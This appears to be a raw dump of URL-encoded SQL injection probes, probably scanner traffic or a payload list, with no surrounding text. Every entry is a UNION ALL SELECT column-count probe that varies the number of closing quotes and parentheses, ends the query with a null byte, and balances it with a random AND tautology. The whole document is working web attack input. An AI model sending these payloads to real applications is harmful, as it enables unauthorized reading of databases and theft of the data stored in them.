-7663%29%29%29%20UNION%20ALL%20SELECT%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%2C%201150%00%20AND%20%28%28%289198%3D9198 -3649%29%29%29%20UNION%20ALL%20SELECT%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%00%20AND%20%28%28%283610%3D3610 -4207%29%29%29%20UNION%20ALL%20SELECT%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%2C%203041%00%20AND%20%28%28%282805%3D2805 -4895%29%29%29%20UNION%20ALL%20SELECT%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%2C%209764%00%20AND%20%28%28%289461%3D9461 -6815%29%29%29%20UNION%20ALL%20SELECT%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%2C%208049%00%20AND%20%28%28%288460%3D8460 -1856%29%29%29%20UNION%20ALL%20SELECT%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%00%20AND%20%28%28%289671%3D9671 -9340%29%29%29%20UNION%20ALL%20SELECT%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%2C%203707%00%20AND%20%28%28%285012%3D5012 -1317%20UNION%20ALL%20SELECT%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%00 -3005%20UNION%20ALL%20SELECT%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%00 -7780%20UNION%20ALL%20SELECT%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%2C%207008%00 -5484%20UNION%20ALL%20SELECT%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%2C%202851%00 -3068%20UNION%20ALL%20SELECT%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%00 -2466%20UNION%20ALL%20SELECT%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%2C%209227%00 -4565%20UNION%20ALL%20SELECT%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%2C%207184%00 -2109%20UNION%20ALL%20SELECT%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%00 -8741%20UNION%20ALL%20SELECT%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%2C%204435%00 -7312%20UNION%20ALL%20SELECT%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%2C%209394%00 -6749%27%29%20UNION%20ALL%20SELECT%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%00%20AND%20%28%27RRir%27%3D%27RRir -3060%27%29%20UNION%20ALL%20SELECT%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%2C%201378%00%20AND%20%28%27IJRe%27%3D%27IJRe -8345%27%29%20UNION%20ALL%20SELECT%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%2C%205292%00%20AND%20%28%27hdQZ%27%3D%27hdQZ -7971%27%29%20UNION%20ALL%20SELECT%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%00%20AND%20%28%27Auge%27%3D%27Auge -6119%27%29%20UNION%20ALL%20SELECT%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%2C%205136%00%20AND%20%28%27gMeb%27%3D%27gMeb -3434%27%29%20UNION%20ALL%20SELECT%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%2C%208900%00%20AND%20%28%27tPZE%27%3D%27tPZE -1207%27%29%20UNION%20ALL%20SELECT%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%00%20AND%20%28%27eTnk%27%3D%27eTnk -9894%27%29%20UNION%20ALL%20SELECT%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%2C%209121%00%20AND%20%28%27qWdG%27%3D%27qWdG -2715%27%29%20UNION%20ALL%20SELECT%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%2C%202021%00%20AND%20%28%27XCCZ%27%3D%27XCCZ -4271%27%29%20UNION%20ALL%20SELECT%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%00%20AND%20%28%27uWPC%27%3D%27uWPC -8521%27%29%29%20UNION%20ALL%20SELECT%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%2C%203575%00%20AND%20%28%28%27HgzT%27%3D%27HgzT -2070%27%29%29%20UNION%20ALL%20SELECT%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%2C%207717%00%20AND%20%28%28%27UTXc%27%3D%27UTXc -4176%27%29%29%20UNION%20ALL%20SELECT%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%2C%204203%00%20AND%20%28%28%27GtNW%27%3D%27GtNW -6360%27%29%29%20UNION%20ALL%20SELECT%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%2C%209997%00%20AND%20%28%28%27QmjU%27%3D%27QmjU -1318%27%29%29%20UNION%20ALL%20SELECT%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%2C%202154%00%20AND%20%28%28%27sgbu%27%3D%27sgbu -4431%27%29%29%20UNION%20ALL%20SELECT%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%00%20AND%20%28%28%27LXwx%27%3D%27LXwx -9608%27%29%29%20UNION%20ALL%20SELECT%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%2C%206190%00%20AND%20%28%28%27VdZz%27%3D%27VdZz -9672%27%29%29%20UNION%20ALL%20SELECT%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%00%20AND%20%28%28%27Wipr%27%3D%27Wipr -2687%27%29%29%20UNION%20ALL%20SELECT%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%2C%203414%00%20AND%20%28%28%27IexM%27%3D%27IexM -5351%27%29%29%20UNION%20ALL%20SELECT%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%2C%201724%00%20AND%20%28%28%27rjjh%27%3D%27rjjh -5425%27%29%29%29%20UNION%20ALL%20SELECT%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%00%20AND%20%28%28%28%27yvSD%27%3D%27yvSD -8486%27%29%29%29%20UNION%20ALL%20SELECT%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%2C%206458%00%20AND%20%28%28%28%27zgTt%27%3D%27zgTt -9891%27%29%29%29%20UNION%20ALL%20SELECT%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%00%20AND%20%28%28%28%27qakm%27%3D%27qakm -5854%27%29%29%29%20UNION%20ALL%20SELECT%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%2C%207689%00%20AND%20%28%28%28%27nHmw%27%3D%27nHmw -3543%27%29%29%29%20UNION%20ALL%20SELECT%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%2C%208226%00%20AND%20%28%28%28%27Zfcn%27%3D%27Zfcn -4775%27%29%29%29%20UNION%20ALL%20SELECT%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%2C%209465%00%20AND%20%28%28%28%27OYBt%27%3D%27OYBt -4001%27%29%29%29%20UNION%20ALL%20SELECT%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%00%20AND%20%28%28%28%27XaFG%27%3D%27XaFG -5147%27%29%29%29%20UNION%20ALL%20SELECT%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%2C%202370%00%20AND%20%28%28%28%27qzve%27%3D%27qzve -3196%27%29%29%29%20UNION%20ALL%20SELECT%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%00%20AND%20%28%28%28%27njFf%27%3D%27njFf -7653%27%29%29%29%20UNION%20ALL%20SELECT%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%2C%209980%00%20AND%20%28%28%28%27gAZg%27%3D%27gAZg 